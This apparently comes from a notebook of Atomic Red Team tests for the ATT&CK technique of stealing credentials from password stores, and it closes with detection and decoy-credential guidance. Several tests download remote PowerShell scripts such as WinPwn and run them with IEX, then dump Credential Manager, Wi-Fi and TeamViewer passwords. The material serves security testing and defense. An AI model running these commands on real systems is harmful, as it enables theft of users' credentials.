# T1555 - Credentials from Password Stores
Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

## Atomic Tests

### Atomic Test #1 - Extract Windows Credential Manager via VBA
This module will extract the credentials found within the Windows credential manager and dump
them to $env:TEMP\windows-credentials.txt

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "word.Application" | Out-Null
  $process = "winword"
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]This module will extract the credentials from Windows Credential Manager**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force   
```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 2

### Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]This module will extract the credentials from Windows Credential Manager**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 3

### Atomic Test #4 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
vaultcmd /listcreds:"Windows Credentials" /all
```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 4

### Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
vaultcmd /listcreds:"Web Credentials" /all
```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 5

### Atomic Test #6 - WinPwn - Loot local Credentials - lazagneThe [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 6

### Atomic Test #7 - WinPwn - Loot local Credentials - Wifi CredentialsLoot local Credentials - Wifi Credentials technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive  ```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 7

### Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer PasswordsLoot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive  ```

In [ ]:
Invoke-AtomicTest T1555 -TestNumbers 8

## Detection
Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.


## Shield Active Defense
### Decoy Credentials 
 Create user credentials that are used for active defense purposes. 

 Seed a target system with credentials (such as username/password, browser tokens, and other forms of authentication data) for the purpose of engagement. Decoy credentials can be planted in many locations and leveraged in a variety of ways.
#### Opportunity
In order to prolong an adversary engagement operation or enable detections, there is an opportunity to introduce credentials to an adversary that you want them to collect and use.
#### Use Case
A defender can plant decoy credentials across an array of locations to increase the chances of an adversary finding and using them.
#### Procedures
Create user credentials for a decoy account, such as 'User ABC'.  Store those credentials in the browser and other places on the system to see if an adversary attempts to harvest them.
